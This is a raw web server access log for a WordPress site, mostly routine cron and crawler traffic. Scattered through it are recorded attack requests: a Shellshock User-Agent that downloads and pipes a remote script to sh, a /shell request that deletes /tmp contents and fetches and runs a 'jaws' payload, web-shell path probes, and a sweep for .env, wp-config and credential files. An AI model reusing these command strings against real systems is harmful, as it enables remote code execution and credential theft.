File: /home/logs/cqqizhou_access_2025-08-23.log
36.133.115.36 - - [23/Aug/2025:00:00:19 +0800] "POST /wp-cron.php?doing_wp_cron=1755878419.6894869804382324218750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
20.65.193.34 - - [23/Aug/2025:00:00:19 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 zgrab/0.x"
36.133.115.36 - - [23/Aug/2025:00:12:48 +0800] "POST /wp-cron.php?doing_wp_cron=1755879168.1366820335388183593750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
91.224.92.17 - - [23/Aug/2025:00:13:07 +0800] "GET / HTTP/1.1" 200 96805 "-" "-"
36.133.115.36 - - [23/Aug/2025:00:21:00 +0800] "POST /wp-cron.php?doing_wp_cron=1755879660.3246829509735107421875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
91.224.92.17 - - [23/Aug/2025:00:21:21 +0800] "GET / HTTP/1.1" 200 109837 "-" "-"
36.133.115.36 - - [23/Aug/2025:00:23:22 +0800] "POST /wp-cron.php?doing_wp_cron=1755879802.8216080665588378906250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
103.81.249.126 - - [23/Aug/2025:00:23:24 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [23/Aug/2025:00:27:55 +0800] "POST /wp-cron.php?doing_wp_cron=1755880075.6196498870849609375000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
170.64.166.144 - - [23/Aug/2025:00:27:55 +0800] "GET /aaa9 HTTP/1.1" 404 8988 "-" "Mozilla/5.0 zgrab/0.x"
170.64.166.144 - - [23/Aug/2025:00:28:04 +0800] "GET /aab8 HTTP/1.1" 404 8991 "-" "Mozilla/5.0 zgrab/0.x"
170.64.166.144 - - [23/Aug/2025:00:28:12 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 zgrab/0.x"
42.236.12.217 - - [23/Aug/2025:00:32:46 +0800] "GET / HTTP/1.1" 200 39302 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36; 360Spider"
36.133.115.36 - - [23/Aug/2025:00:56:06 +0800] "POST /wp-cron.php?doing_wp_cron=1755881766.6632959842681884765625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
149.50.103.48 - - [23/Aug/2025:00:56:06 +0800] "GET / HTTP/1.1" 200 33395 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [23/Aug/2025:01:06:39 +0800] "POST /wp-cron.php?doing_wp_cron=1755882399.7585010528564453125000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
162.0.226.36 - - [23/Aug/2025:01:06:40 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [23/Aug/2025:01:23:49 +0800] "POST /wp-cron.php?doing_wp_cron=1755883429.6782720088958740234375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
36.133.40.17 - - [23/Aug/2025:01:23:49 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)"
36.133.40.17 - - [23/Aug/2025:01:23:49 +0800] "GET / HTTP/1.1" 200 39302 "-" "Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)"
45.156.87.165 - - [23/Aug/2025:01:32:05 +0800] "GET / HTTP/1.1" 499 0 "-" "() { :; }; /bin/bash -c \x22(wget -qO- http://74.194.191.52/rondo.qre.sh||busybox wget -qO- http://74.194.191.52/rondo.qre.sh||curl -s http://74.194.191.52/rondo.qre.sh)|sh\x22& #Mozilla/5.0 (bang2012@protonmail.com)"
36.133.115.36 - - [23/Aug/2025:01:32:06 +0800] "POST /wp-cron.php?doing_wp_cron=1755883925.9666109085083007812500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
36.133.115.36 - - [23/Aug/2025:01:32:56 +0800] "POST /wp-cron.php?doing_wp_cron=1755883975.9873321056365966796875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
91.224.92.14 - - [23/Aug/2025:01:32:56 +0800] "GET / HTTP/1.1" 200 33394 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [23/Aug/2025:01:38:33 +0800] "POST /wp-cron.php?doing_wp_cron=1755884313.4060668945312500000000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
115.159.33.43 - - [23/Aug/2025:01:38:33 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36"
36.133.115.36 - - [23/Aug/2025:01:45:34 +0800] "POST /wp-cron.php?doing_wp_cron=1755884734.8905808925628662109375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
77.90.185.47 - - [23/Aug/2025:01:45:34 +0800] "GET /.env.production HTTP/1.1" 404 8991 "-" "Mozilla/5.0 zgrab/0.x"
36.133.115.36 - - [23/Aug/2025:01:46:47 +0800] "POST /wp-cron.php?doing_wp_cron=1755884807.9141829013824462890625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.135.193.253 - - [23/Aug/2025:01:46:48 +0800] "GET / HTTP/1.1" 200 151669 "-" "-"
36.133.115.36 - - [23/Aug/2025:01:51:56 +0800] "POST /wp-cron.php?doing_wp_cron=1755885116.1552140712738037109375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
103.81.84.34 - - [23/Aug/2025:01:51:56 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [23/Aug/2025:01:58:05 +0800] "POST /wp-cron.php?doing_wp_cron=1755885485.4754040241241455078125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
107.175.141.10 - - [23/Aug/2025:01:58:06 +0800] "GET / HTTP/1.1" 200 151669 "-" "-"
36.133.115.36 - - [23/Aug/2025:01:59:37 +0800] "POST /wp-cron.php?doing_wp_cron=1755885577.5308189392089843750000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
149.50.103.48 - - [23/Aug/2025:01:59:37 +0800] "GET / HTTP/1.1" 200 33394 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [23/Aug/2025:02:01:30 +0800] "POST /wp-cron.php?doing_wp_cron=1755885690.3065340518951416015625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.153.71.12 - - [23/Aug/2025:02:01:30 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.153.71.12 - - [23/Aug/2025:02:01:32 +0800] "GET / HTTP/1.1" 200 33394 "http://www.cqqizhou.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
13.69.247.106 - - [23/Aug/2025:02:03:33 +0800] "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1" 404 27 "-" "-"
13.69.247.106 - - [23/Aug/2025:02:03:33 +0800] "GET /xc.php HTTP/1.1" 404 27 "-" "-"
13.69.247.106 - - [23/Aug/2025:02:03:33 +0800] "GET /gmo.php HTTP/1.1" 404 27 "-" "-"
13.69.247.106 - - [23/Aug/2025:02:03:33 +0800] "GET /lock360.php HTTP/1.1" 404 27 "-" "-"
13.69.247.106 - - [23/Aug/2025:02:03:34 +0800] "GET /ar.php HTTP/1.1" 404 27 "-" "-"
13.69.247.106 - - [23/Aug/2025:02:03:34 +0800] "GET /we.php HTTP/1.1" 404 27 "-" "-"
13.69.247.106 - - [23/Aug/2025:02:03:34 +0800] "GET /abcd.php HTTP/1.1" 404 27 "-" "-"
13.69.247.106 - - [23/Aug/2025:02:03:34 +0800] "GET /modules/mod_simplefileuploadv1.3/elements/filemanager.php HTTP/1.1" 404 27 "-" "-"
13.69.247.106 - - [23/Aug/2025:02:03:35 +0800] "GET /pp.php HTTP/1.1" 404 27 "-" "-"
13.69.247.106 - - [23/Aug/2025:02:03:35 +0800] "GET /wp.php HTTP/1.1" 404 27 "-" "-"
13.69.247.106 - - [23/Aug/2025:02:03:35 +0800] "GET /geck.php HTTP/1.1" 404 27 "-" "-"
13.69.247.106 - - [23/Aug/2025:02:03:35 +0800] "GET /class20.php HTTP/1.1" 404 27 "-" "-"
13.69.247.106 - - [23/Aug/2025:02:03:36 +0800] "GET /ol.php HTTP/1.1" 404 27 "-" "-"
13.69.247.106 - - [23/Aug/2025:02:03:36 +0800] "GET /wp-gr.php HTTP/1.1" 404 27 "-" "-"
13.69.247.106 - - [23/Aug/2025:02:03:36 +0800] "GET /pp.php HTTP/1.1" 404 27 "-" "-"
13.69.247.106 - - [23/Aug/2025:02:03:36 +0800] "GET /error.php HTTP/1.1" 404 27 "-" "-"
13.69.247.106 - - [23/Aug/2025:02:03:36 +0800] "GET /wp-gr.php HTTP/1.1" 404 27 "-" "-"
13.69.247.106 - - [23/Aug/2025:02:03:37 +0800] "GET /build.php HTTP/1.1" 404 27 "-" "-"
13.69.247.106 - - [23/Aug/2025:02:03:37 +0800] "GET /chosen.php HTTP/1.1" 404 27 "-" "-"
13.69.247.106 - - [23/Aug/2025:02:03:37 +0800] "GET /class20.php HTTP/1.1" 404 27 "-" "-"
13.69.247.106 - - [23/Aug/2025:02:03:37 +0800] "GET /size.php HTTP/1.1" 404 27 "-" "-"
13.69.247.106 - - [23/Aug/2025:02:03:38 +0800] "GET /2x.php HTTP/1.1" 404 27 "-" "-"
13.69.247.106 - - [23/Aug/2025:02:03:38 +0800] "GET /fm.php?p= HTTP/1.1" 404 27 "-" "-"
36.133.115.36 - - [23/Aug/2025:02:10:01 +0800] "POST /wp-cron.php?doing_wp_cron=1755886201.1566629409790039062500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.6 - - [23/Aug/2025:02:10:01 +0800] "GET / HTTP/1.1" 200 33394 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [23/Aug/2025:02:14:43 +0800] "POST /wp-cron.php?doing_wp_cron=1755886483.0549330711364746093750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
120.71.59.24 - - [23/Aug/2025:02:14:43 +0800] "GET / HTTP/1.1" 200 33394 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [23/Aug/2025:02:17:28 +0800] "POST /wp-cron.php?doing_wp_cron=1755886648.1257390975952148437500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.130.3.122 - - [23/Aug/2025:02:17:28 +0800] "GET /wp-json/oembed/1.0/embed?url=http%3A%2F%2Fcqqizhou.com%2F HTTP/1.1" 200 1097 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [23/Aug/2025:02:41:23 +0800] "POST /wp-cron.php?doing_wp_cron=1755888083.6463220119476318359375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
173.249.144.86 - - [23/Aug/2025:02:41:23 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [23/Aug/2025:02:59:29 +0800] "POST /wp-cron.php?doing_wp_cron=1755889169.1343588829040527343750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
91.224.92.14 - - [23/Aug/2025:02:59:29 +0800] "GET / HTTP/1.1" 200 33394 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
52.167.144.221 - - [23/Aug/2025:03:02:23 +0800] "GET /wp-content/uploads/2025/07/1750671808-partner6_200x50.webp HTTP/1.1" 200 3004 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
36.133.115.36 - - [23/Aug/2025:03:04:40 +0800] "POST /wp-cron.php?doing_wp_cron=1755889480.2215659618377685546875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
149.50.103.48 - - [23/Aug/2025:03:04:40 +0800] "GET / HTTP/1.1" 200 33394 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [23/Aug/2025:03:08:25 +0800] "POST /wp-cron.php?doing_wp_cron=1755889705.2998790740966796875000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.157.53.115 - - [23/Aug/2025:03:08:25 +0800] "GET / HTTP/1.1" 200 33394 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [23/Aug/2025:03:30:14 +0800] "POST /wp-cron.php?doing_wp_cron=1755891014.6030929088592529296875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
95.154.198.138 - - [23/Aug/2025:03:30:14 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
64.23.158.132 - - [23/Aug/2025:03:57:30 +0800] "GET / HTTP/1.1" 200 39302 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36"
156.193.128.203 - - [23/Aug/2025:03:59:45 +0800] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 213.209.150.159/jaws;sh+/tmp/jaws HTTP/1.1" 499 0 "-" "Hello, world"
36.133.115.36 - - [23/Aug/2025:03:59:46 +0800] "POST /wp-cron.php?doing_wp_cron=1755892786.1447200775146484375000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
36.133.115.36 - - [23/Aug/2025:04:06:39 +0800] "POST /wp-cron.php?doing_wp_cron=1755893199.7808530330657958984375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
149.50.103.48 - - [23/Aug/2025:04:06:40 +0800] "GET / HTTP/1.1" 200 33393 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [23/Aug/2025:04:17:38 +0800] "POST /wp-cron.php?doing_wp_cron=1755893858.2055749893188476562500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
143.244.172.186 - - [23/Aug/2025:04:17:38 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [23/Aug/2025:04:55:35 +0800] "POST /wp-cron.php?doing_wp_cron=1755896135.2132709026336669921875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
91.224.92.14 - - [23/Aug/2025:04:55:35 +0800] "GET / HTTP/1.1" 200 33394 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [23/Aug/2025:05:07:34 +0800] "POST /wp-cron.php?doing_wp_cron=1755896854.2310180664062500000000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
149.50.103.48 - - [23/Aug/2025:05:07:34 +0800] "GET / HTTP/1.1" 200 33394 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [23/Aug/2025:05:10:04 +0800] "POST /wp-cron.php?doing_wp_cron=1755897004.6158289909362792968750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
203.217.101.237 - - [23/Aug/2025:05:10:05 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [23/Aug/2025:05:17:10 +0800] "POST /wp-cron.php?doing_wp_cron=1755897430.6130959987640380859375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
14.215.163.132 - - [23/Aug/2025:05:17:10 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
14.215.163.132 - - [23/Aug/2025:05:17:12 +0800] "GET / HTTP/1.1" 200 33394 "http://www.cqqizhou.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [23/Aug/2025:05:23:24 +0800] "POST /wp-cron.php?doing_wp_cron=1755897804.5108211040496826171875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
20.168.107.40 - - [23/Aug/2025:05:23:24 +0800] "GET /developmentserver/metadatauploader HTTP/1.1" 404 8991 "-" "Mozilla/5.0 zgrab/0.x"
36.133.115.36 - - [23/Aug/2025:05:25:02 +0800] "POST /wp-cron.php?doing_wp_cron=1755897902.4334950447082519531250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
185.177.72.36 - - [23/Aug/2025:05:25:02 +0800] "GET /.git/HEAD HTTP/1.1" 404 8990 "-" "-"
185.177.72.36 - - [23/Aug/2025:05:25:02 +0800] "GET /.env HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:25:03 +0800] "GET /phpinfo HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:25:03 +0800] "GET /phpinfo.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:25:04 +0800] "GET /portal/.env HTTP/1.1" 404 8991 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:25:05 +0800] "GET /env/.env HTTP/1.1" 404 8989 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:25:06 +0800] "GET /api/.env HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:25:07 +0800] "GET /app/.env HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:25:08 +0800] "GET /dev/.env HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:25:09 +0800] "GET /new/.env HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:25:09 +0800] "GET /new/.env.local HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:25:10 +0800] "GET /new/.env.production HTTP/1.1" 404 8988 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:25:11 +0800] "GET /new/.env.staging HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:25:11 +0800] "GET /_phpinfo.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:25:12 +0800] "GET /_profiler/phpinfo HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:25:12 +0800] "GET /_profiler/phpinfo/info.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:25:13 +0800] "GET /_profiler/phpinfo/phpinfo.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:25:14 +0800] "GET /wp-config HTTP/1.1" 404 8991 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:25:14 +0800] "GET /aws-secret.yaml HTTP/1.1" 404 8991 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:25:15 +0800] "GET /awstats/.env HTTP/1.1" 404 8989 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:25:16 +0800] "GET /conf/.env HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:25:17 +0800] "GET /cron/.env HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:25:18 +0800] "GET /www/.env HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:25:19 +0800] "GET /docker/.env HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:25:20 +0800] "GET /docker/app/.env HTTP/1.1" 404 8989 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:25:21 +0800] "GET /env.backup HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:25:21 +0800] "GET /xampp/phpinfo.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:25:21 +0800] "GET /lara/info.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:25:21 +0800] "GET /lara/phpinfo.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:25:22 +0800] "GET /laravel/info.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:25:22 +0800] "GET /.vscode/.env HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:25:23 +0800] "GET /js/.env HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:25:24 +0800] "GET /laravel/.env HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:25:25 +0800] "GET /laravel/core/.env HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:25:26 +0800] "GET /mail/.env HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:25:27 +0800] "GET /mailer/.env HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:25:28 +0800] "GET /nginx/.env HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:25:29 +0800] "GET /public/.env HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
